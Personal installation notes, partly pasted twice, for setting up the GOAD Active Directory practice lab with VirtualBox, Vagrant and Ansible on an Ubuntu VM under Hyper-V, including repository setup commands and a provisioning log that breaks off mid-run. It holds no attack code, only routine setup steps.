GOAD install

Ubuntu20 + Virtualbox 7.1

refence used : https://github.com/Orange-Cyberdefense/GOAD/issues/281

Before booting the VM for the first time you’ll need to enable nested virtualization to allow VirtualBox to run inside of Hyper-V. Open powershell as Administrator and run the following command to identify the name of the VM you created for GOAD

C:\Windows\system32> get-vm
PowerShell
Use that name, which in my instance was “Ubuntu 22.04 LTS GOAD”, and execute

C:\Windows\system32> get-vm | where Name -eq “Ubuntu 22.04 LTS GOAD” | set-vmprocessor -ExposeVirtualizationExtensions $true

https://forums.virtualbox.org/viewtopic.php?t=113562
https://orange-cyberdefense.github.io/GOAD/providers/virtualbox/

Clean Install Oracle VirtualBox 7.1.8 on Ubuntu LTS 20.04/22.04/24.04 and 24.10 from Oracle VirtualBox Repository
==================================================================================================================
Should work on: 
Ubuntu 20.04 LTS (focal) 
Ubuntu 22.04 LTS (jammy) 
Ubuntu 24.04 LTS (noble) 
Ubuntu 24.10 (oriole)
 
Preface: 
Make sure to copy each command at once before you paste it into your Terminal!

Every new upcoming release of Virtual 7.1.x should be easily upgradeable after this process via apt.

Disclaimer:
I am not given any guarantees or warranties for the below steps. I tested them thoroughfully. If you find any errors or typos in it. Just let me know.
Use it at your own risk and under your own responsibility. 
This guide does not subsitute the offical VirtualBox Installation Manual.

Always backup your system first!!!

1. Setup Oracle VirtualBox repository
-------------------------------------------------------------------------------------
sudo sh -c "echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/oracle-virtualbox-2016.gpg] http://download.virtualbox.org/virtualbox/debian $(grep '^UBUNTU_CODENAME=' /etc/os-release | cut -d '=' -f 2) contrib' | sudo tee /etc/apt/sources.list.d/oracle-virtualbox.list"

2. Import GPG Key
--------------------- 
wget -O- https://www.virtualbox.org/download/oracle_vbox_2016.asc | sudo gpg --yes --output /usr/share/keyrings/oracle-virtualbox-2016.gpg --dearmor

3. Set permissions for GPG Key
----------------------------------
sudo chmod 644 /usr/share/keyrings/oracle-virtualbox-2016.gpg

4. Update packages with apt
---------------------------
sudo apt update

5. Install essential packages
-----------------------------
sudo apt install dkms menu build-essential libelf-dev make gcc linux-headers-$(uname -r)

6. Install VirtualBox 7.1.x
-------------------------------
sudo apt install virtualbox-7.1

optional:
---------
If you like you might want to install the VirtualBox extensions as well.
--
Please make sure to accept the Oracle VirtualBox Extension Pack PUEL (Personal-Use-And-Educational-License) before proceeding to step 7.
https://www.virtualbox.org/wiki/VirtualBox_PUEL
--

7. Get Extension Pack and SHA265SUM to check file integrity 
------------------------------------------------------------
mkdir -p $HOME/Downloads && cd $HOME/Downloads
wget -P $HOME/Downloads https://download.virtualbox.org/virtualbox/7.1.8/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack
wget -P $HOME/Downloads https://download.virtualbox.org/virtualbox/7.1.8/SHA256SUMS  

sha256sum -c <(grep "Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack" "$HOME/Downloads/SHA256SUMS")

8. Install Extension Pack (Using "Y" or "y" will accept the PUEL License automatically)
---------------------------------------------------------------------------------------
echo "y" | sudo /usr/bin/vboxmanage extpack install --replace $HOME/Downloads/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack  

9. Add your user to vboxuser group
----------------------------------
sudo usermod -aG vboxusers $USER

10. Reboot and have fun VM'ing around with VirtualBox
------------------------------------------------------
sudo reboot

Cleanup: If you want to get rid of Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack and SHA256SUMS file in Downloads. You can remove it.
rm $HOME/Downloads/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack*

---------
https://orange-cyberdefense.github.io/GOAD/installation/linux/

wget -O - https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(grep -oP '(?<=UBUNTU_CODENAME=).*' /etc/os-release || lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant


vagrant plugin install vagrant-reload vagrant-vbguest winrm winrm-fs winrm-elevated


sudo apt install python3.10-venv

bolke@ubuntu22goad:~$ git clone https://github.com/Orange-Cyberdefense/GOAD
Cloning into 'GOAD'...

./goad.sh -p virtualbox

bolke@ubuntu22goad:~/GOAD$ ./goad.sh -p virtualbox

   _____   _____          _____
  / ____| / ||| \   /\   |  __ \
 | |  __||  |||  | /  \  | |  | |
 | | |_ ||  |||  |/ /\ \ | |  | |
 | |__| ||  |||  / /__\ \| |__| |
  \_____| \_|||_/________\_____/
    Game Of Active Directory
      Pwning is coming

Goad management console type help or ? to list commands

[*] Start Loading default instance
[*] lab instances :
[-] No instance found, change your config and use install to create a lab instance

GOAD/virtualbox/local/192.168.56.X > set_lab GOAD

GOAD/virtualbox/local/192.168.56.X > install
[+] Current Settings
[*] Current Lab         : GOAD
[*] Current Provider    : virtualbox
[*] Current Provisioner : local
[*] Current IP range    : 192.168.56.X
[*] Extension(s)        :

Create lab with theses settings ? (y/N)y
[*] Create instance folder
[*] Create instance providing files
[*] Instance vagrantfile created : /workspace/1fbadf-goad-virtualbox/provider/Vagrantfile
[*] Create lab provisioning file inventory_disable_vagrant
[+] Lab inventory file created : /workspace/1fbadf-goad-virtualbox/inventory_disable_vagrant
[*] Create instance provisioning files
[+] Instance inventory file created : /workspace/1fbadf-goad-virtualbox/inventory
[*] Create instance extensions inventory files
[*] Instance 1fbadf-goad-virtualbox created
[+] Instance 1fbadf-goad-virtualbox loaded
┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID              ┃ Lab  ┃ Provider   ┃ IP Range        ┃ Status       ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 1fbadf-goad-virtualbox │ GOAD │ virtualbox │ 192.168.56.0/24 │ not provided │ No         │            │
└──────────────────────────┴──────┴────────────┴─────────────────┴──────────────┴────────────┴────────────┘
[*] Launch providing
[*] CWD: /workspace/1fbadf-goad-virtualbox/provider
[*] Running command : vagrant up
Bringing machine 'GOAD-DC01' up with 'virtualbox' provider...
Bringing machine 'GOAD-DC02' up with 'virtualbox' provider...
Bringing machine 'GOAD-DC03' up with 'virtualbox' provider...
Bringing machine 'GOAD-SRV02' up with 'virtualbox' provider...
Bringing machine 'GOAD-SRV03' up with 'virtualbox' provider...
==> GOAD-DC01: Box 'StefanScherer/windows_2019' could not be found. Attempting to find and install...
    GOAD-DC01: Box Provider: virtualbox
    GOAD-DC01: Box Version: 2021.05.15
==> GOAD-DC01: Loading metadata for box 'StefanScherer/windows_2019'
    GOAD-DC01: URL: https://vagrantcloud.com/api/v2/vagrant/StefanScherer/windows_2019
==> GOAD-DC01: Adding box 'StefanScherer/windows_2019' (v2021.05.15) for provider: virtualbox
    GOAD-DC01: Downloading: https://vagrantcloud.com/StefanScherer/boxes/windows_2019/versions/2021.05.15/providers/virtualbox/unknown/vagrant.box
Progress: 1% (Rate: 21.3M/s, Estimated time remaining: 0:07:23)



-------------
GOAD Lab Setup
GOAD is an Active Directory lab consisting of multiple Windows virtual machines containing many common misconfigutations and vulnerabilites that you might find in an Active Directory environment. A visual representation of the entire AD network on Orange Cyberdefense’s GitHub provides an overview of the configuration along with the users, groups and running services.

I installed GOAD using Hyper-V’s Quick Create with an Ubuntu 22 VM. I gave the main VM 250 GB of hard drive space (about 115 GB is all that is needed according to their documentation), 32 GB of ram and 6 processors. After everything was setup and running, including Exegol as my attack framework, top showed that I was using a total of 24 GB of memory, so configuring with a little less than 32 GB of ram will probably be fine.

After the VM is created open its settings, click on the hard drive and increase its size since by default Quick Create gives you only about a 20 GB hard drive. Once that’s done start the VM. After the VM is fully booted and the install is complete you will need to use gparted to expand the drive to use all of the available hard drive space.

Before booting the VM for the first time you’ll need to enable nested virtualization to allow VirtualBox to run inside of Hyper-V. Open powershell as Administrator and run the following command to identify the name of the VM you created for GOAD

C:\Windows\system32> get-vm
PowerShell
Use that name, which in my instance was “Ubuntu 22.04 LTS GOAD”, and execute

C:\Windows\system32> get-vm | where Name -eq "Ubuntu 22.04 LTS GOAD" | set-vmprocessor -ExposeVirtualizationExtensions $true
PowerShell
Once the machine is booted make sure to use gparted to assign all available disc space to the main partition. This is a fairly simple task. Instructions can easily be found online.

Other than that, the installation instructions on the GitHub page worked just fine and the entire install process with Vagrant and Ansible ran without issue. Those instructions are included below along with the steps to install VirtualBox, Vagrant, Docker and other packages that weren’t installed by default in the Ubuntu VM.

sudo apt install virtualbox git curl gnupg ca-certificates

wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg

echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list

sudo apt update && sudo apt install vagrant
Bash
Install Docker using the apt repository instructions on the Docker site if you don’t already have Docker installed. Reboot the Ubuntu VM what that’s finished.

Clone the GOAD repository and run vagrant

$> git clone https://github.com/Orange-Cyberdefense/GOAD.git

$> cd GOAD

$> ./goad.sh -t check -l GOAD -p virtualbox -m docker

$> ./goad.sh -t install -l GOAD -p virtualbox  -m docker
Bash
The installation takes quite a bit of time but it can run unattended, so once you execute the above you can leave it to do its thing and then check in on it from time to time. In case of a timeout run ./goad.sh -t install -l GOAD -p virtualbox -m docker again and it will pick up where it left off.

For my attack machine I installed Exegol instead of a Kali VM. My instructions on installing Exegol can be viewed here.

the commands to provision

bolke@hacky:~/GOAD$ ./goad.sh 

   _____   _____          _____ 
  / ____| / ||| \   /\   |  __ \
 | |  __||  |||  | /  \  | |  | |
 | | |_ ||  |||  |/ /\ \ | |  | |
 | |__| ||  |||  / /__\ \| |__| |
  \_____| \_|||_/________\_____/
    Game Of Active Directory
      Pwning is coming

Goad management console type help or ? to list commands

[*] Start Loading default instance
[+] Instance 850bec-goad-light-virtualbox loaded 
[*] lab instances :
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID                    ┃ Lab        ┃ Provider   ┃ IP Range        ┃ Status                 ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 850bec-goad-light-virtualbox │ GOAD-Light │ virtualbox │ 192.168.56.0/24 │ ready for provisioning │ Yes        │            │
└────────────────────────────────┴────────────┴────────────┴─────────────────┴────────────────────────┴────────────┴────────────┘

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision
provision            provision_extension  provision_lab        provision_lab_from   

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision_lab
[*] Loading inventory
[+] Lab inventory : /home/bolke/GOAD/ad/GOAD-Light/data/inventory file found 
[+] Provider inventory : /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory file found 
[+] Global inventory : /home/bolke/GOAD/globalsettings.ini file found 
[*] Loading playbook list
[+] build.yml file found 
[+] ad-servers.yml file found 
[+] ad-parent_domain.yml file found 
[+] ad-child_domain.yml file found 
[+] wait5m.yml file found 
[+] ad-members.yml file found 
[+] ad-trusts.yml file found 
[+] ad-data.yml file found 
[+] ad-gmsa.yml file found 
[+] laps.yml file found 
[+] ad-relations.yml file found 
[+] adcs.yml file found 
[+] ad-acl.yml file found 
[+] servers.yml file found 
[+] security.yml file found 
[+] vulnerabilities.yml file found 
[*] Run playbook : build.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
build.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

C:\Windows\system32> get-vm | where Name -eq “Ubuntu 22.04 LTS GOAD” | set-vmprocessor -ExposeVirtualizationExtensions $true

etc….

https://forums.virtualbox.org/viewtopic.php?t=113562
https://orange-cyberdefense.github.io/GOAD/providers/virtualbox/

Clean Install Oracle VirtualBox 7.1.8 on Ubuntu LTS 20.04/22.04/24.04 and 24.10 from Oracle VirtualBox Repository
==================================================================================================================
Should work on: 
Ubuntu 20.04 LTS (focal) 
Ubuntu 22.04 LTS (jammy) 
Ubuntu 24.04 LTS (noble) 
Ubuntu 24.10 (oriole)
 
Preface: 
Make sure to copy each command at once before you paste it into your Terminal!

Every new upcoming release of Virtual 7.1.x should be easily upgradeable after this process via apt.

Disclaimer:
I am not given any guarantees or warranties for the below steps. I tested them thoroughfully. If you find any errors or typos in it. Just let me know.
Use it at your own risk and under your own responsibility. 
This guide does not subsitute the offical VirtualBox Installation Manual.

Always backup your system first!!!

1. Setup Oracle VirtualBox repository
-------------------------------------------------------------------------------------
sudo sh -c "echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/oracle-virtualbox-2016.gpg] http://download.virtualbox.org/virtualbox/debian $(grep '^UBUNTU_CODENAME=' /etc/os-release | cut -d '=' -f 2) contrib' | sudo tee /etc/apt/sources.list.d/oracle-virtualbox.list"

2. Import GPG Key
--------------------- 
wget -O- https://www.virtualbox.org/download/oracle_vbox_2016.asc | sudo gpg --yes --output /usr/share/keyrings/oracle-virtualbox-2016.gpg --dearmor

3. Set permissions for GPG Key
----------------------------------
sudo chmod 644 /usr/share/keyrings/oracle-virtualbox-2016.gpg

4. Update packages with apt
---------------------------
sudo apt update

5. Install essential packages
-----------------------------
sudo apt install dkms menu build-essential libelf-dev make gcc linux-headers-$(uname -r)

6. Install VirtualBox 7.1.x
-------------------------------
sudo apt install virtualbox-7.1

optional:
---------
If you like you might want to install the VirtualBox extensions as well.
--
Please make sure to accept the Oracle VirtualBox Extension Pack PUEL (Personal-Use-And-Educational-License) before proceeding to step 7.
https://www.virtualbox.org/wiki/VirtualBox_PUEL
--

7. Get Extension Pack and SHA265SUM to check file integrity 
------------------------------------------------------------
mkdir -p $HOME/Downloads && cd $HOME/Downloads
wget -P $HOME/Downloads https://download.virtualbox.org/virtualbox/7.1.8/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack
wget -P $HOME/Downloads https://download.virtualbox.org/virtualbox/7.1.8/SHA256SUMS  

sha256sum -c <(grep "Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack" "$HOME/Downloads/SHA256SUMS")

8. Install Extension Pack (Using "Y" or "y" will accept the PUEL License automatically)
---------------------------------------------------------------------------------------
echo "y" | sudo /usr/bin/vboxmanage extpack install --replace $HOME/Downloads/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack  

9. Add your user to vboxuser group
----------------------------------
sudo usermod -aG vboxusers $USER

10. Reboot and have fun VM'ing around with VirtualBox
------------------------------------------------------
sudo reboot

Cleanup: If you want to get rid of Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack and SHA256SUMS file in Downloads. You can remove it.
rm $HOME/Downloads/Oracle_VirtualBox_Extension_Pack-7.1.8.vbox-extpack*

---------
https://orange-cyberdefense.github.io/GOAD/installation/linux/

wget -O - https://apt.releases.hashicorp.com/gpg | sudo gpg --dearmor -o /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(grep -oP '(?<=UBUNTU_CODENAME=).*' /etc/os-release || lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install vagrant


vagrant plugin install vagrant-reload vagrant-vbguest winrm winrm-fs winrm-elevated


sudo apt install python3.10-venv

bolke@ubuntu22goad:~$ git clone https://github.com/Orange-Cyberdefense/GOAD
Cloning into 'GOAD'...

./goad.sh -p virtualbox

bolke@ubuntu22goad:~/GOAD$ ./goad.sh -p virtualbox

   _____   _____          _____
  / ____| / ||| \   /\   |  __ \
 | |  __||  |||  | /  \  | |  | |
 | | |_ ||  |||  |/ /\ \ | |  | |
 | |__| ||  |||  / /__\ \| |__| |
  \_____| \_|||_/________\_____/
    Game Of Active Directory
      Pwning is coming

Goad management console type help or ? to list commands

[*] Start Loading default instance
[*] lab instances :
[-] No instance found, change your config and use install to create a lab instance

GOAD/virtualbox/local/192.168.56.X > set_lab GOAD

GOAD/virtualbox/local/192.168.56.X > install
[+] Current Settings
[*] Current Lab         : GOAD
[*] Current Provider    : virtualbox
[*] Current Provisioner : local
[*] Current IP range    : 192.168.56.X
[*] Extension(s)        :

Create lab with theses settings ? (y/N)y
[*] Create instance folder
[*] Create instance providing files
[*] Instance vagrantfile created : /workspace/1fbadf-goad-virtualbox/provider/Vagrantfile
[*] Create lab provisioning file inventory_disable_vagrant
[+] Lab inventory file created : /workspace/1fbadf-goad-virtualbox/inventory_disable_vagrant
[*] Create instance provisioning files
[+] Instance inventory file created : /workspace/1fbadf-goad-virtualbox/inventory
[*] Create instance extensions inventory files
[*] Instance 1fbadf-goad-virtualbox created
[+] Instance 1fbadf-goad-virtualbox loaded
┏━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID              ┃ Lab  ┃ Provider   ┃ IP Range        ┃ Status       ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 1fbadf-goad-virtualbox │ GOAD │ virtualbox │ 192.168.56.0/24 │ not provided │ No         │            │
└──────────────────────────┴──────┴────────────┴─────────────────┴──────────────┴────────────┴────────────┘
[*] Launch providing
[*] CWD: /workspace/1fbadf-goad-virtualbox/provider
[*] Running command : vagrant up
Bringing machine 'GOAD-DC01' up with 'virtualbox' provider...
Bringing machine 'GOAD-DC02' up with 'virtualbox' provider...
Bringing machine 'GOAD-DC03' up with 'virtualbox' provider...
Bringing machine 'GOAD-SRV02' up with 'virtualbox' provider...
Bringing machine 'GOAD-SRV03' up with 'virtualbox' provider...
==> GOAD-DC01: Box 'StefanScherer/windows_2019' could not be found. Attempting to find and install...
    GOAD-DC01: Box Provider: virtualbox
    GOAD-DC01: Box Version: 2021.05.15
==> GOAD-DC01: Loading metadata for box 'StefanScherer/windows_2019'
    GOAD-DC01: URL: https://vagrantcloud.com/api/v2/vagrant/StefanScherer/windows_2019
==> GOAD-DC01: Adding box 'StefanScherer/windows_2019' (v2021.05.15) for provider: virtualbox
    GOAD-DC01: Downloading: https://vagrantcloud.com/StefanScherer/boxes/windows_2019/versions/2021.05.15/providers/virtualbox/unknown/vagrant.box
Progress: 1% (Rate: 21.3M/s, Estimated time remaining: 0:07:23)



-------------
GOAD Lab Setup
GOAD is an Active Directory lab consisting of multiple Windows virtual machines containing many common misconfigutations and vulnerabilites that you might find in an Active Directory environment. A visual representation of the entire AD network on Orange Cyberdefense’s GitHub provides an overview of the configuration along with the users, groups and running services.

I installed GOAD using Hyper-V’s Quick Create with an Ubuntu 22 VM. I gave the main VM 250 GB of hard drive space (about 115 GB is all that is needed according to their documentation), 32 GB of ram and 6 processors. After everything was setup and running, including Exegol as my attack framework, top showed that I was using a total of 24 GB of memory, so configuring with a little less than 32 GB of ram will probably be fine.

After the VM is created open its settings, click on the hard drive and increase its size since by default Quick Create gives you only about a 20 GB hard drive. Once that’s done start the VM. After the VM is fully booted and the install is complete you will need to use gparted to expand the drive to use all of the available hard drive space.

Before booting the VM for the first time you’ll need to enable nested virtualization to allow VirtualBox to run inside of Hyper-V. Open powershell as Administrator and run the following command to identify the name of the VM you created for GOAD

C:\Windows\system32> get-vm
PowerShell
Use that name, which in my instance was “Ubuntu 22.04 LTS GOAD”, and execute

C:\Windows\system32> get-vm | where Name -eq "Ubuntu 22.04 LTS GOAD" | set-vmprocessor -ExposeVirtualizationExtensions $true
PowerShell
Once the machine is booted make sure to use gparted to assign all available disc space to the main partition. This is a fairly simple task. Instructions can easily be found online.

Other than that, the installation instructions on the GitHub page worked just fine and the entire install process with Vagrant and Ansible ran without issue. Those instructions are included below along with the steps to install VirtualBox, Vagrant, Docker and other packages that weren’t installed by default in the Ubuntu VM.

sudo apt install virtualbox git curl gnupg ca-certificates

wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg

echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list

sudo apt update && sudo apt install vagrant
Bash
Install Docker using the apt repository instructions on the Docker site if you don’t already have Docker installed. Reboot the Ubuntu VM what that’s finished.

Clone the GOAD repository and run vagrant

$> git clone https://github.com/Orange-Cyberdefense/GOAD.git

$> cd GOAD

$> ./goad.sh -t check -l GOAD -p virtualbox -m docker

$> ./goad.sh -t install -l GOAD -p virtualbox  -m docker
Bash
The installation takes quite a bit of time but it can run unattended, so once you execute the above you can leave it to do its thing and then check in on it from time to time. In case of a timeout run ./goad.sh -t install -l GOAD -p virtualbox -m docker again and it will pick up where it left off.

For my attack machine I installed Exegol instead of a Kali VM. My instructions on installing Exegol can be viewed here.

complete

bolke@hacky:~/GOAD$ ./goad.sh 

   _____   _____          _____ 
  / ____| / ||| \   /\   |  __ \
 | |  __||  |||  | /  \  | |  | |
 | | |_ ||  |||  |/ /\ \ | |  | |
 | |__| ||  |||  / /__\ \| |__| |
  \_____| \_|||_/________\_____/
    Game Of Active Directory
      Pwning is coming

Goad management console type help or ? to list commands

[*] Start Loading default instance
[+] Instance 850bec-goad-light-virtualbox loaded 
[*] lab instances :
┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┓
┃ Instance ID                    ┃ Lab        ┃ Provider   ┃ IP Range        ┃ Status                 ┃ Is Default ┃ Extensions ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━┩
│ > 850bec-goad-light-virtualbox │ GOAD-Light │ virtualbox │ 192.168.56.0/24 │ ready for provisioning │ Yes        │            │
└────────────────────────────────┴────────────┴────────────┴─────────────────┴────────────────────────┴────────────┴────────────┘

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision
provision            provision_extension  provision_lab        provision_lab_from   

GOAD-Light/virtualbox/local/192.168.56.X (850bec-goad-light-virtualbox) > provision_lab
[*] Loading inventory
[+] Lab inventory : /home/bolke/GOAD/ad/GOAD-Light/data/inventory file found 
[+] Provider inventory : /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory file found 
[+] Global inventory : /home/bolke/GOAD/globalsettings.ini file found 
[*] Loading playbook list
[+] build.yml file found 
[+] ad-servers.yml file found 
[+] ad-parent_domain.yml file found 
[+] ad-child_domain.yml file found 
[+] wait5m.yml file found 
[+] ad-members.yml file found 
[+] ad-trusts.yml file found 
[+] ad-data.yml file found 
[+] ad-gmsa.yml file found 
[+] laps.yml file found 
[+] ad-relations.yml file found 
[+] adcs.yml file found 
[+] ad-acl.yml file found 
[+] servers.yml file found 
[+] security.yml file found 
[+] vulnerabilities.yml file found 
[*] Run playbook : build.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
build.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [build all] *******************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc01]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on dc02]
 [started TASK: common : Force a DNS on the adapter {{nat_adapter}} on srv02]
 [started TASK: common : Set a proxy for specific protocols on dc01]
 [started TASK: common : Set a proxy for specific protocols on dc02]
 [started TASK: common : Set a proxy for specific protocols on srv02]
 [started TASK: common : Configure IE to use a specific proxy per protocol on dc01]
 [started TASK: common : Configure IE to use a specific proxy per protocol on dc02]
 [started TASK: common : Configure IE to use a specific proxy per protocol on srv02]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc01]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on dc02]
 [started TASK: common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version on srv02]

TASK [common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version] ***************************************************************************************************
changed: [dc01]
changed: [srv02]
changed: [dc02]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc01]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on dc02]
 [started TASK: common : Windows | Check for ComputerManagementDsc Powershell module on srv02]

TASK [common : Windows | Check for ComputerManagementDsc Powershell module] ********************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Windows | Enable Remote Desktop on dc01]
 [started TASK: common : Windows | Enable Remote Desktop on dc02]
 [started TASK: common : Windows | Enable Remote Desktop on srv02]

TASK [common : Windows | Enable Remote Desktop] ************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Windows | Check for xNetworking Powershell module on dc01]
 [started TASK: common : Windows | Check for xNetworking Powershell module on dc02]
 [started TASK: common : Windows | Check for xNetworking Powershell module on srv02]

TASK [common : Windows | Check for xNetworking Powershell module] ******************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: common : Firewall | Allow RDP through Firewall on dc01]
 [started TASK: common : Firewall | Allow RDP through Firewall on dc02]
